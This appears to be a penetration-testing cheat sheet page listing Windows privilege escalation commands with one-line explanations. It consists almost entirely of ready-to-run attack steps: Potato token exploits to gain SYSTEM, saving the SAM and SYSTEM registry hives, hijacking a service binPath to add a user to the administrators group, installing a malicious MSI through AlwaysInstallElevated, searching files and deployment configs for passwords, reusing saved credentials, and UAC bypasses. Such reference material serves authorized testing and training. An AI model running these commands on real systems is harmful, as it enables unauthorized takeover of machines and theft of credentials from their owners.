privesc

Windows Privilege Escalation

Manual Windows privilege escalation — enumeration, token/Potato attacks (PrintSpoofer/GodPotato), service misconfigurations, AlwaysInstallElevated, credential hunting, UAC bypasses, kernel exploits and scheduled-task/autorun hijacks.

1 views Jun 2026 lazyhackers

Enumeration (5)

whoami /all

Groups + privileges + integrity level in one shot

enum baseline

whoami /priv

List token privileges (look for SeImpersonate/SeBackup/SeDebug)

enum token

systeminfo; wmic qfe get HotFixID

OS build + installed patches (feed to wesng/watson)

enum patches

net user; net localgroup administrators

Local users and who is admin

enum users

powershell -ep bypass -c "IEX(...);Invoke-AllChecks"

PowerUp automated misconfig checks

enum powerup

Token Privileges (Potato) (4)

PrintSpoofer.exe -i -c cmd

SeImpersonate → SYSTEM via the spooler named pipe

seimpersonate printspoofer

GodPotato -cmd "cmd /c whoami"

Modern SeImpersonate→SYSTEM (DCOM/RPC)

seimpersonate godpotato

JuicyPotatoNG.exe -t * -p cmd.exe

SeImpersonate→SYSTEM on older builds

seimpersonate juicypotato

SeBackupPrivilege -> reg save hklm\sam sam; reg save hklm\system system

Dump SAM/SYSTEM with backup rights

sebackup sam

Service Misconfigurations (4)

wmic service get name,pathname,startmode | findstr /i /v "c:\windows\\" | findstr /i """

Find unquoted service paths

service unquoted

accesschk.exe -uwcqv "Everyone" * /accepteula

Find services your user can modify

service accesschk

sc config <svc> binpath= "cmd /c net localgroup administrators user /add"

Hijack a weak-permission service binPath

service binpath

writable service .exe -> replace it, then restart the service

DLL/binary hijack of a service

service hijack

Registry & AlwaysInstallElevated (3)

reg query HKLM\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

If 1 (both hives) → install a SYSTEM MSI

registry aie

msiexec /quiet /qn /i evil.msi

Run the malicious MSI (AlwaysInstallElevated)

aie msi

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

Autologon credentials in the registry

registry creds

Credential Hunting (4)

cmdkey /list -> runas /savecred /user:admin cmd

Reuse stored credentials without knowing them

creds runas

findstr /si password *.xml *.ini *.txt *.config

Grep the filesystem for passwords

creds findstr

type C:\Windows\Panther\Unattend.xml

Deployment files often hold local-admin creds

creds unattend

GPP cPassword in SYSVOL (Groups.xml)

MS14-025 — decryptable domain creds

creds gpp

UAC Bypass & Kernel (4)

fodhelper.exe registry UAC bypass

Elevate from a medium-integrity admin without a prompt

uac fodhelper

eventvwr.exe / sdclt UAC bypass

Alternate auto-elevate bypasses

uac

systeminfo | wesng / watson

Map missing patches to kernel exploits

kernel patches

PrintNightmare (CVE-2021-1675/34527)

Spooler RCE/LPE

kernel printnightmare

Scheduled Tasks & Autoruns (3)

schtasks /query /fo LIST /v | findstr /i "Task To Run Run As User"

Find tasks running as a higher-priv user

schtask enum

writable task binary -> replace it before it runs

Hijack a scheduled-task executable

schtask hijack

autorunsc.exe -a * -accepteula

Enumerate all autostart entries (Sysinternals)

autoruns enum

Windows Privilege Escalation

Related Articles

Linux Privilege Escalation

Windows Privilege Escalation

AppArmor & SELinux Explained

Escaping a chroot Jail

Escaping a Restricted Shell

Related Courses

Web Application Penetration Testing

Network Penetration Testing

Networking Fundamentals for Pentesters

Windows Privilege Escalation — Complete Course

Bug Bounty Hunting — From Recon to Bounty